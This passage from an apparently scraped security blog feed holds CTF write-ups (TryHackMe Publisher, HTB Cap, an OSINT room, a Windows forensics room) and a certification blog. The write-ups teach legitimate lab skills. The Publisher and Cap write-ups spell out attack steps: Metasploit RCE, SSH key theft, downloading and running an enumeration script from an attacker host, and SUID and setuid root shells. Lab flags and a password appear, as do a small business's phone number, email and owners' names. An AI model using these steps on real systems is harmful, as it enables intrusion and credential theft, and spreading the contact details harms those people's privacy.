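    "/usr/bin/su", "/usr/bin/fusermount", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

# Constructed stand-in for `find / -user root -perm -u=s 2>/dev/null` output (not a real scan).
SAMPLE_FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/env
/usr/sbin/run_container
"""

# Constructed stand-in for a custom SUID wrapper's bytes (not any real binary).
SAMPLE_WRAPPER = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
                  + b"/bin/bash\x00-c\x00/opt/run_container.sh\x00")


def triage_suid(find_output):
    """Split SUID hits into (gtfobins_shell_spawners, unexpected_binaries)."""
    gtfo, unexpected = [], []
    for path in find_output.split():
        name = os.path.basename(path)
        if name in GTFOBINS_SUID_SHELL:
            gtfo.append(path)          # known shell spawner: try the GTFOBins one-liner
        elif path not in STOCK_SUID:
            unexpected.append(path)    # custom binary: inspect what it executes
    return gtfo, unexpected


# Absolute paths as `strings <binary> | grep '^/'` would show them.
_ABS_PATH = re.compile(rb"/(?:[A-Za-z0-9_.-]+/)*[A-Za-z0-9_.-]+")


def embedded_paths(blob, min_len=4):
    """Absolute paths referenced inside a binary's bytes, sorted and de-duplicated."""
    return sorted({m.group().decode() for m in _ABS_PATH.finditer(blob)
                   if len(m.group()) >= min_len})


def writable_targets(blob, access=os.access):
    """Referenced paths the current user can write; a hit means root will run our content.

    `access` is injectable so the check can run against constructed paths offline.
    """
    return [p for p in embedded_paths(blob) if access(p, os.W_OK)]


if __name__ == "__main__":
    shells, custom = triage_suid(SAMPLE_FIND_OUTPUT)
    print("GTFOBins shell spawners:", shells)
    print("non-stock SUID binaries:", custom)
    print("paths embedded in wrapper:", embedded_paths(SAMPLE_WRAPPER))
```

On a real box, feed triage_suid the actual find output and writable_targets the bytes of each non-stock hit (open(path, "rb").read()); a path that comes back from writable_targets is the lever, and the GTFOBins hits are the quick wins.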
I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nMy thoughts always when reviewing my draft publications\nPhase 1: Initial Foothold via SPIP RCE\nEnumeration and Vulnerable Service Identification\nWe begin by visiting the main website, where the name of the underlying software is immediately visible, and concurrently run an Nmap scan.\nI go to the website, see a community magazine web page, and the word SPIP catches my eye.\nI run an Nmap scan:\nnmap -sC -sV 10.201.49.35 -T 4\nI see ports 22 (SSH) and 80 (HTTP) open.\nWe check for common web directories using Gobuster:\ngobuster dir -u http://10.201.49.35/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100\nI see /spip and /images.\nInspecting the /spip directory and using Wappalyzer confirms the exact software and version:\nSPIP v4.2.0\nSearching for it I find an RCE exploit for this version in Exploit-DB.\nRemote Code Execution (RCE) and SSH Key Retrieval\nWe use the identified exploit within Metasploit to gain a reverse shell and immediately look for a way to establish persistent access.\nmsfconsole\nSearch for spip; the last result is the 2023 RCE module (the index shown by search varies, so pick it by name rather than by number):\nuse 12\nset RHOSTS \u0026lt;victim IP\u0026gt;\nset LHOST \u0026lt;our ip\u0026gt;\nset TARGETURI /spip\nrun\nNow drop into a shell:\nshell\nFrom the shell, we navigate to the user’s home directory and retrieve their private SSH key. A readable id_rsa is worth more than the web shell: it survives the Metasploit session and gives a proper TTY.\ncd /home/think\nls -la → we see .ssh\ncd .ssh → ls -la\ncat id_rsa → copy the contents\nIn a new terminal, we save the key, lock down its permissions (ssh refuses a private key that is readable by others), and use it to log in as the user think via SSH:\nnano thinkrsa → paste the key\nchmod 600 thinkrsa\nssh -i thinkrsa think@10.201.49.35\ncat user.txt\nfa229046d44eda6a3598c73ad96f4ca5\nPhase 2: Local Enumeration and Writeable Directories\nFinding a Writeable Location\nWe attempt to download the LinPEAS enumeration script but encounter permission errors, forcing us to find a directory with write permissions.\nIn our host terminal:\ncd /usr/share/peass/linpeas\nthen,\npython -m http.server 80\nBack in the SSH session:\nwget http://10.9.2.204/linpeas.sh\nBut this is denied.\nThis is because the shell we land in is not allowed to write in these directories (the home directory included), so we search the filesystem for directories where the user think has write permissions:\ncd ../\nfind / -type d -user think -writable 2\u0026gt;/dev/null\nAnd then we see: /run/user/1000\nRunning LinPEAS and Identifying the Exploit Path\nWith a suitable location found, we download and execute the enumeration script.\ncd /run/user/1000\nwget http://10.9.2.204/linpeas.sh\nchmod +x linpeas.sh\n./linpeas.sh\nThe LinPEAS output points us toward the /opt directory and a specific file.\nLooking through the output I see /opt and a run_container.sh file there.\ncd /opt\nWe check for SUID binaries and find the binary corresponding to the script.\nSeeing the script, we search for SUID binaries:\nfind / -perm /4000 2\u0026gt;/dev/null\nAnd here we see: /usr/sbin/run_container\nWe inspect the script and the binary to confirm the execution path:\ncat run_container.sh\nWe see the script’s code.\nstrings /usr/sbin/run_container\nHere I see /bin/bash and /opt/run_container.sh among the embedded strings.\nPhase 3: Privilege Escalation via SUID Container\nThe run_container binary is a custom-made SUID wrapper that runs /opt/run_container.sh through /bin/bash as root. Because the binary refers to /bin/bash by its absolute path, PATH hijacking does not apply here; the lever is the script itself. If /opt/run_container.sh is writable by think (ls -l /opt/run_container.sh is the check to run first), anything appended to it executes as root the next time the wrapper is invoked. The SUID copy of bash that appears in /tmp below comes from such an appended command; the write-up does not show that edit, so make it before running the wrapper.\nThe restricted login shell cannot write to /opt, so we first start an unrestricted bash from our writable directory (cp /bin/bash /run/user/1000/ first if it is not already there):\ncd /run/user/1000\nls\n./bash\ncd /opt\nrun_container\nWe interrupt the script’s execution once our appended command has run:\nctrl+c\nls /tmp\nand we see bash.\nWe execute the newly visible bash shell with the -p flag to keep the elevated effective UID granted by the SUID bit (without -p, bash drops it):\n/tmp/bash -p\nwhoami\ncd /root\ncat root.txt\nAnd we get the root flag:\n3a4225cc9e85709adda6ef55d6a4f2ca\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/publisher-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"PUBLISHER- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner rated OSINT room from the TryHackMe platform titled “SEARCH LIGHT IMINT”\nSEARCH LIGHT IMINT- TRY HACK ME- ROOM\nThis room is classified as easy and is an OSINT type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nPhase 1: Locating European LandmarksTarget 1: Carnaby Street (London)We begin the investigation by downloading and examining the first resource file provided.\nStart by downloading the resource file providedThe first thing I see is Carnaby StreetAnd on the right I see a Make Up StoreThese two specific details provide high-confidence location identifiers. We use this information for an online search.\nSearching up with these details onlineWe find that it’s in LondonAnd the exact image is even here: https://www.ldnfashion.com/features/carnaby-street-10-fascinating-facts-never-knew/Target 2: Piccadilly Circus Tube Station (London)For the next image, external knowledge and visual recognition provide the initial hint.\nNext, I see the image and get the hint it has something to do with London because I’ve seen many similar points like the design and logo in many music videosSearching with these visual clues, we confirm the location and gather its details:\nSearching it up I confirm it’s in London, Piccadilly Circus, opened in 1906, 4 platformshttps://www.wikiwand.com/en/articles/Piccadilly_Circus_tube_stationPhase 2: International and Business LocationsTarget 3: Vancouver International Airport (Canada)The third image contains a clear three-letter code that acts as an immediate identifier.\nNext, I open the image and see YVRKnowing the airport code I immediately think of Vancouver, CanadaWe confirm this using an image search to gather regional details:\nI confirm it by using the image search and yes it’s in Vancouverit’s Vancouver International Airport, Canada, Richmond CityTarget 4: The Wee Coffee Shop (Scotland)The next image includes a hint that mentions Scotland, prompting us to focus our attention on visible signage.\nNext, I see the image and the hint mentions ScotlandI see the banner of a shop opposite to the coffee shop: The Edinburgh Woolen MillUsing the banner name, we perform a reverse search that leads us directly to the coffee shop’s social media 
presence:\nA simple reverse search leads me to identifying the place and heading to their facebook page I get the detailsIt’s in Blairgowrie City, Allan Street, phone: +447878 839128, email: theweecoffeeshop@aol.com, owners: Debbie and David CochraneTarget 5: Katz’s Deli (New York City)The fifth target is identified through reverse image searching and requires correlation with a specific person.\nNext, I do the usual reverse image searchI see a lot of images saying it’s: Katz’s DeliWe then search for the required name to confirm the correlation:\nSearching up for bon bon appetit editor working there: Andrew KnowltonTarget 6: Rudolph the Chrome Nosed Reindeer (College Sculpture)The image structure suggests a college or apartment setting due to the architecture visible behind the statue.\nNext, as it looks, I think it’s in a college because of the dorm structure or apartments behind the statueA reverse search identifies the specific statue and its creator:\nReverse searching the imageIt is taken by: Kjersti StensrudIt is called: Rudolph the Chrome Nosed ReindeerPhase 3: Advanced Geospatial CorrelationTarget 7: Lady Justice Statue and Westin Hotel (Alexandria, VA)The final two targets require detailed map correlation using a 360-degree view. We begin with the statue.\nNext, I reverse search this image and I find out it’s about justice but similar statues are located in multiple locations around the worldGoing through multiple imagesI find an exact match because of the reflection in the imageThe specific details allow us to pinpoint the exact statue and courthouse building:\nIt’s called: Lady Justice, building location: Albert V. 
Bryan United States Courthouse in Alexandria, VirginiaTo find the building opposite the courthouse, we use the map’s 360-degree view feature.\nTo find the opposite building I use 360 view on maps and I see a WestInnClick on it: The Westin Alexandria Old TownTarget 8: Novotel Singapore Clarke Quay (Singapore)The final file is a video, which provides clear geographical clues based on the surrounding landmarks.\nNext, I click on the file and it’s a videoI immediately know it’s Singapore seeing the Marina Bay Hotel with the famous infinity poolWe list all surrounding landmarks visible in the video for correlation:\nBeing somewhat familiar with Singapore, another hint is it’s near and facing the riverside point (east), a massive chunk of greenery (west), facing Clarke Quay Central (north) \u0026amp; Marina Hotel (north), Mandarin Hotel (north-west)Using Riverside Point as a reference, we use the 360-degree map view to position ourselves and identify the building from which the high-angle video was shot:\nUsing 360 views I use river point as the reference and position myself in a way that on my east is Riverside PointRight at the position there is a high-rise building and it’s Hotel NovotelThe architectural details of the source building are then confirmed against the hotel:\nfrom the video we know it was taken from a multi-story building and at a higher point and I even noticed the brown walls/bricks which resembled the same hence the hotel is: Novotel Singapore Clarke QuayCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"30 November 2025","externalUrl":null,"permalink":"/writeups/tryhackme/search-light-imint-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SEARCH LIGHT IMINT- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the Hack The Box platform titled “CAP”\nCAP -HACK THE BOX- ROOM\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Initial Foothold via Network Analysis (PCAP)\nWeb Reconnaissance and Packet Capture Discovery\nWe begin by navigating to the victim IP address in a browser and observe the main dashboard.\nWe then look through the available options on the left sidebar.\nThe presence of the “pcap” option immediately suggests a network analysis vector, but the capture it offers shows 0 packets.\nThe capture is addressed by a numeric ID in the URL (/data/N) that the server never checks against our session, so we simply try other IDs (an insecure direct object reference, not directory traversal).\nWalking the IDs 2 -\u0026gt; 1 -\u0026gt; 0\nWe see that /data/0 holds a real packet capture, so we download the file and open it with Wireshark.\nCredentials Extraction from PCAP\nWe scroll through the pcap file, looking for cleartext traffic or credentials transmitted over unencrypted protocols. FTP (port 21) sends USER and PASS as plain text, so Follow TCP Stream on the FTP conversation, or the display filter ftp.request.command == \"PASS\", shows them directly.\nScrolling through the pcap we see the username nathan (the same as the dashboard user) and right below it the password.\nSuccess! 
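Wireshark does the extraction interactively; to see exactly what is in the bytes, here is an added example (not code from the original write-up) in Python that parses a libpcap file by hand and pulls FTP USER/PASS pairs out of the TCP payloads, which is why cleartext FTP is a finding on its own. The capture it parses is constructed inline (the username is the one from the box, the password is made up), and the parser assumes an Ethernet link type, IPv4, and the classic microsecond pcap format rather than pcapng.

```python
"""Hand-parse a libpcap file and pull cleartext FTP logins: added example, not the write-up's code."""
import struct

PCAP_MAGIC = 0xA1B2C3D4          # microsecond-resolution libpcap magic
LINKTYPE_ETHERNET = 1


def _ipv4(addr):
    return bytes(int(o) for o in addr.split("."))


def tcp_frame(src, dst, sport, dport, payload):
    """Ethernet/IPv4/TCP frame around payload (checksums left zero; constructed data only)."""
    eth = b"\x00" * 12 + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     _ipv4(src), _ipv4(dst))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Serialise frames as a libpcap file image: 24-byte global header, 16-byte record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_payloads(pcap):
    """Yield (src, dst, sport, dport, payload) for each TCP segment; handles both byte orders."""
    end = "<" if struct.unpack_from("<I", pcap, 0)[0] == PCAP_MAGIC else ">"
    if struct.unpack_from(end + "I", pcap, 0)[0] != PCAP_MAGIC:
        raise ValueError("not a libpcap file (pcapng and nanosecond variants not handled)")
    if struct.unpack_from(end + "I", pcap, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack_from(end + "IIII", pcap, off)[2]
        frame = pcap[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                    # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total = struct.unpack_from("!H", frame, 16)[0]
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = frame[14 + ihl: 14 + total]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[data_off:]


def ftp_credentials(pcap):
    """Pair USER/PASS commands sent to port 21 per client socket; FTP carries both in cleartext."""
    pending, creds = {}, []
    for src, dst, sport, dport, payload in iter_tcp_payloads(pcap):
        if dport != 21:
            continue
        line = payload.decode("latin-1").strip()
        if line.upper().startswith("USER "):
            pending[(src, sport)] = line[5:]
        elif line.upper().startswith("PASS ") and (src, sport) in pending:
            creds.append((src, dst, pending.pop((src, sport)), line[5:]))
    return creds


# Constructed capture of one FTP login plus an unrelated HTTP request; the password is made up.
CLIENT, SERVER = "192.168.196.16", "192.168.196.1"
SAMPLE_PCAP = build_pcap([
    tcp_frame(SERVER, CLIENT, 21, 54411, b"220 (vsFTPd 3.0.3)\r\n"),
    tcp_frame(CLIENT, SERVER, 54411, 21, b"USER nathan\r\n"),
    tcp_frame(SERVER, CLIENT, 21, 54411, b"331 Please specify the password.\r\n"),
    tcp_frame(CLIENT, SERVER, 54411, 21, b"PASS ExamplePass1\r\n"),
    tcp_frame(SERVER, CLIENT, 21, 54411, b"230 Login successful.\r\n"),
    tcp_frame(CLIENT, SERVER, 54412, 80, b"GET /data/0 HTTP/1.1\r\nHost: target\r\n\r\n"),
])

if __name__ == "__main__":
    for src, dst, user, password in ftp_credentials(SAMPLE_PCAP):
        print(f"{src} -> {dst}: USER {user} PASS {password}")
```

To run it against the downloaded file, pass open("0.pcap", "rb").read() to ftp_credentials instead of SAMPLE_PCAP; pairing on the (client IP, client port) socket rather than on the IP alone keeps two logins from the same host from being mixed up.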
We recover the login credentials:\nUsername: nathan\nPassword: Buck3tH4TF0RM3!\nUser Flag Retrieval via SSH\nOur initial port scan showed the SSH port was open.\nWe use the newly acquired credentials to log in over SSH (the FTP password also works for the shell account, a reuse worth noting in the report):\nssh nathan@\u0026lt;VICTIM_IP\u0026gt;\n# Password: Buck3tH4TF0RM3!\nls -la\ncat user.txt\ncc170d72081dbfbdb0235885765c281e\nPhase 2: Privilege Escalation via a Python Interpreter with CAP_SETUID\nPermissions and Capabilities Check\nThe first step in privilege escalation is checking whether our current user can run commands as root using sudo.\nsudo -l # nathan cannot run anything through sudo, so this path is closed\nSo we check the Python executable:\nls -l $(which python3 2\u0026gt;/dev/null || which python 2\u0026gt;/dev/null)\nBreaking that command down:\nwhich python3 prints the full path of python3 (e.g. /usr/bin/python3); 2\u0026gt;/dev/null silences its error output.\n|| which python 2\u0026gt;/dev/null is a fallback: if which python3 fails (non-zero exit), the shell tries which python instead.\n$( ... ) is command substitution: the path printed by the inner command is inserted into the outer command.\nls -l then lists permissions, owner, size, timestamp and, for a symlink, its target.\nThe output shows:\nlrwxrwxrwx 1 root root 9 Mar 13 2020 /usr/bin/python3 -\u0026gt; python3.8\nThose lrwxrwxrwx bits belong to the symlink, not to the interpreter, so on their own they prove nothing. For os.setuid(0) to succeed the interpreter must run with the CAP_SETUID capability, which it gets either from the setuid bit on the real binary or from a file capability. The checks that settle it are:\nls -l /usr/bin/python3.8\ngetcap -r / 2\u0026gt;/dev/null\nOn this box it is getcap that gives the answer: the interpreter carries the cap_setuid file capability rather than the setuid bit, and that is what lets the script below work.\nPython Exploit Execution\nWe will now create a short Python script that sets the effective user ID to 0 (root) and spawns a new shell.\nnano exp.py\nWe paste the following exploit code into exp.py:\nimport os                 # Python’s OS interface module\nos.setuid(0)              # set the user ID to root; only succeeds with CAP_SETUID\nos.system(\"/bin/bash\")    # spawn a shell (/bin/bash) as a child process\nThen we execute it:\npython3 exp.py\nBOOM! We get root.\nNow we grab the root.txt flag:\ncd /root\ncat root.txt\n# c59116a937946a389f64420bc079d166\nCONCL USION:\nI hope this write-up walkthrough was helpful to you all!\nI’ve tried a slightly different format and writing style this time, exploring new ways to make things clearer and more concise for you all. Any feedback is more than welcome!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"13 November 2025","externalUrl":null,"permalink":"/writeups/hackthebox/cap-hack-the-box-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"CAP -HACK THE BOX- ROOM","type":"writeups"},{"content":"","date":"13 November 2025","externalUrl":null,"permalink":"/writeups/hackthebox/","section":"Security Labs \u0026 Writeups","summary":"","title":"HackTheBox Machines","type":"writeups"},{"content":" Hello everyone! 
This is a beginner-friendly, forensics-flavoured room from the TryHackMe platform titled “Investigating Windows”\nINVESTIGATING WINDOWS- TRY HACK ME- ROOM\nThis room is classified as easy and is a CTF-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nNot a huge Windows user now, but childhood nostalgia hits different seeing this\nPhase 1: Setup and Initial Access (RDP)\nEstablishing RDP Connection\nTo begin the investigation, we first need to establish a Remote Desktop Protocol (RDP) connection to the target Windows machine.\nI started by installing and starting the xrdp service on my attacking machine:\nsudo apt update \u0026amp;\u0026amp; sudo apt upgrade\nsudo apt install xrdp -y\nupdate-rc.d xrdp enable\nservice xrdp start\nA caveat: xrdp is an RDP server (it lets others connect to your machine) and is not needed to connect out to the target; the rdesktop client below is all that is required. If you do run xrdp and it errors out, check whether the default RDP port (3389) is already in use, kill the process, and restart the service:\nsudo lsof -i :3389\nsudo kill \u0026lt;PID\u0026gt; (use your PID accordingly)\nsudo systemctl start xrdp\nsudo systemctl status xrdp\nWe then use rdesktop to connect to the target IP as the Administrator user, using the credentials provided by the room:\nrdesktop -u Administrator -p ‘letmein123!’ 10.201.84.31\n# and the desktop appears on our screen\nPhase 2: System Reconnaissance and User Analysis\nInitial System Information Gathering\nUpon gaining RDP access, we head to PowerShell to gather initial system information, specifically the version of Windows running.\nsysteminfo\nWe see: Windows Server 2016\nAs soon as we run this command, we notice a Notepad window opening in the background, a sign of a triggered process or concurrent activity worth keeping in mind.\nUser Logins and Compromise Date\nNext, we investigate who the users are and when they last logged in to determine the attacker’s path.\nnet user # we see Jenny \u0026amp; John\nnet user jenny # last logon shows Never\nnet user john # last logon shows 3/2/2019 5:48:32 PM\nThe last user who logged in was Administrator, as that is who we signed in as through RDP.\nWe also found a reference to the IP 10.34.2.3 in a small pop-up alert when initializing the RDP connection, which could be an internal host or a C2 server.\nWe check for other administrator-level accounts:\nnet localgroup administrators\nAdministrator-level accounts: Guest \u0026amp; Jenny (a Guest account in the Administrators group is a red flag on its own; Guest is normally disabled)\nThroughout these checks, we consistently see the date 3/2/2019 appearing, which suggests this is the likely date of compromise.\nPhase 3: Tracing Attacker Activity\nMalicious Scheduled Task Analysis\nWe now pivot to the Task Scheduler to look for persistence mechanisms.\nGo to Task Scheduler, then double-click the Task Scheduler Library, and we see some tasks.\nLooking at each task and its Actions tab, we identify a suspicious task named clean file system.\nIts action runs a PowerShell script that starts a Netcat listener: \\nc.ps1 -l 1348. A PowerShell script listening on an unusual port is shady.\nFile it was trying to run daily: \\nc.ps1 -l 1348\nPort used: 1348\nWe confirm that Jenny last logged in “Never”, a detail noted during the user enumeration phase.\nEvent Viewer Timeline Analysis\nTo pinpoint the exact moment special privileges were given (a key action in a compromise), we use the Event Viewer.\nGo to Event Viewer → Windows Logs → Security (there are 2,162 events).\nWe filter the events using the time hint we found: the date of compromise, 3/2/2019.\nWe look up the special-privileges event ID (4672) and use that as a filter, together with the date range 3/2/2019 12:00 AM to 11:59 PM.\nScrolling down we find the exact match: 03/02/2019 4:04:49 PM\nThis timestamp is the earliest special-privileges logon on the day of compromise.\nViewing the event as text shows the full record.\nArtifacts and Persistence Check\nWe check the temporary directory for any uploaded tools:\nIn File Explorer go to the C: drive → TMP, and we see a file named mim, which is the Mimikatz binary.\nNext, we check the hosts file, a common location for malicious redirection:\nC: drive → Windows → System32 → drivers → etc → hosts. Scrolling down I see the entry that spoofs google.com.\nThe hosts file modification redirects the poisoned site, google.com, to an address the attacker controls, which is the Command and Control (C\u0026amp;C) mechanism.\nWe check for web shell persistence in the web root:\nGo to inetpub → wwwroot, and we see a .jsp file, which is the web shell.\nFinally, we look at the firewall rules to find the last port that was opened, which is often used for exfiltration or establishing a new C2 channel:\nGo to Windows Firewall → Inbound Rules; the topmost rule is the most recently added one, and it opens port 1337. (Rule order in the GUI is not a reliable timeline on its own, so cross-check the rule name and description before trusting it.)\nCONCLUSION:\nI hope this write-up walkthrough was helpful to you all!\nThis room was more of a forensics-based room on Windows, and it was fun!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. 
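Each of the checks in the Investigating Windows room above (the 4672 filter on the compromise date, the scheduled task's listener, the hosts entries) was done once by hand in the GUI; exported artifacts are easier to re-query. The Python below is an added example and not part of the original write-up. It runs the same three checks over constructed artifacts: a few Security-log lines exported as date,EventID,message, a task action string, and a hosts file. The script path in the task action and the redirect IP in the hosts file are made up; the room's values for those are not on this page.

```python
"""Re-run the Investigating Windows checks over exported artifacts: added example, not the write-up's."""
import re
from datetime import datetime

# Constructed export of Security-log lines as "date time,EventID,message" (not the room's log).
SAMPLE_SECURITY_LOG = """\
03/01/2019 09:12:03 AM,4624,An account was successfully logged on.
03/02/2019 04:04:49 PM,4672,Special privileges assigned to new logon.
03/02/2019 04:04:50 PM,4624,An account was successfully logged on.
03/02/2019 04:37:22 PM,4672,Special privileges assigned to new logon.
03/03/2019 10:00:00 AM,4672,Special privileges assigned to new logon.
"""

# Constructed scheduled-task action; the room's task runs nc.ps1 with -l 1348, the path is assumed.
SAMPLE_TASK_ACTION = r"powershell.exe -ExecutionPolicy Bypass -File C:\TMP\nc.ps1 -l 1348"

# Constructed hosts file; the redirect address is made up.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.2.2.2        google.com
10.2.2.2        www.google.com
"""


def parse_security_events(text):
    """Return [(datetime, event_id, message)] from the exported lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, event_id, message = line.split(",", 2)
        events.append((datetime.strptime(stamp, "%m/%d/%Y %I:%M:%S %p"), int(event_id), message))
    return events


def first_event_on(events, event_id, day):
    """Earliest event_id on `day` ("mm/dd/yyyy"): the Event Viewer filter, done in code."""
    wanted = datetime.strptime(day, "%m/%d/%Y").date()
    hits = sorted(ts for ts, eid, _ in events if eid == event_id and ts.date() == wanted)
    return hits[0] if hits else None


_LISTENER = re.compile(r"(?P<script>\S+\.ps1)\s+-l\s+(?P<port>\d+)", re.IGNORECASE)


def listener_from_task_action(action):
    """(script, port) when a task action starts a '-l <port>' listener, else None."""
    m = _LISTENER.search(action)
    return (m.group("script"), int(m.group("port"))) if m else None


def hosts_anomalies(text):
    """(hostname, ip) pairs that pin a name to a non-loopback address; a clean hosts file has none."""
    bad = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        ip, *names = line.split()
        if ip not in ("127.0.0.1", "::1"):
            bad.extend((name, ip) for name in names)
    return bad


if __name__ == "__main__":
    events = parse_security_events(SAMPLE_SECURITY_LOG)
    print("first 4672 on compromise day:", first_event_on(events, 4672, "03/02/2019"))
    print("task listener:", listener_from_task_action(SAMPLE_TASK_ACTION))
    print("hosts redirects:", hosts_anomalies(SAMPLE_HOSTS))
```

On the real machine the Security log can be exported to CSV from Event Viewer and the task actions read from the Actions tab or the task XML; the same functions then give a timeline you can re-check rather than a one-off GUI scroll.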
Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"9 November 2025","externalUrl":null,"permalink":"/writeups/tryhackme/investigating-windows-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"INVESTIGATING WINDOWS- TRY HACK ME- ROOM","type":"writeups"},{"content":" Disclaimer: The views and experiences shared in this article are purely my own. The CompTIA Security+ is a certification where opinions on… The Security+ Blueprint: How Hitting the “Stop” instead of“Snooze” Button Forced Me to PassDisclaimer: The views and experiences shared in this article are purely my own. The CompTIA Security+ is a certification where opinions on preparation, resources, and difficulty vary widely. This is simply my candid, personal journey, and if sharing my story helps even one person on their path, I’m genuinely happy.I just earned the CompTIA Security+ certification (SY0–701).\nIt wasn’t some epic battle, but it was personally a long-necessary checkpoint. And if I’m honest, if you told me five weeks ago I’d be writing this, I’d have probably just kept hitting “snooze”.\nMy journey wasn’t the perfect, disciplined march to victory. Oh no, it involved a good dose of last-minute scramble and the cold, hard reality of an expiring exam voucher. (Yes, I actually tried to push an October exam to December. My inner procrastinator is unmatched at times xD.)\nBut here I am, out the other side. This is my journey \u0026amp; my POV of how I got through it and so can you easily!\nHitting the “Stop Button”: Why a Deadline Was My Best Study PlanI don’t have the exact timeline because, frankly, I postponed taking this exam for over 8 months, always coming up with some excuse.\nBut then came the deadline. My voucher was about to expire, and I couldn’t push my exam past October. 
So, on September 12th after suddenly realizing the issue, I finally scheduled it for the third week of October.\nMy study pattern that followed was, surprisingly, more consistent than my usual last-minute college efforts lol. I didn’t have a fixed time slot. There were days I studied in the most random situations — like being stuck for a solid two hours post-event due to bad weather, just grinding away. Other days, though I had ample time it was just 15 to 30 minutes of going through.\nMy entire plan revolved around one core principle: learning from my mistakes instead of just passively reviewing the material.\nThe Start at 63%. The Test-First, Learn-from-Mistakes StrategyMy preparation truly began on September 15th with my first mock test from Jason Dion Set1 #1.\nThe result? A 63%. Nope this wasn’t a failure; it was nothing but a clear diagnostic.\nHere is how my initial scores broke down across all five domains:\n1.0 General Security Concepts: 50%2.0 Threats, Vulnerabilities, and Mitigations: 65%3.0 Security Architecture: 69%4.0 Security Operations: 72%5.0 Security Program Management and Oversight: 53%This told me exactly where to focus. My approach was always: Test → Identify Mistakes → Study → Test Again.\nI worked through the next 15 days by mid October and after around 15–20 different exams. I hit a familiar plateau around 70–75%.\nAfter pushing through for the next few days, at my final mock, taken just two hours before the exam while watching some NFL.\nI don’t suggest doing this lolI hit 85% for the first and last time. I never hit the “recommended” 95%, but honestly, I’m fine with that.\nLearning Tricks:Having little to no corporate experience, a lot of the governance and policy terms were completely new.\nI remember repeatedly making mistakes just because I couldn’t grasp what the question was asking.\nMy solution was simple: Use analogies. 
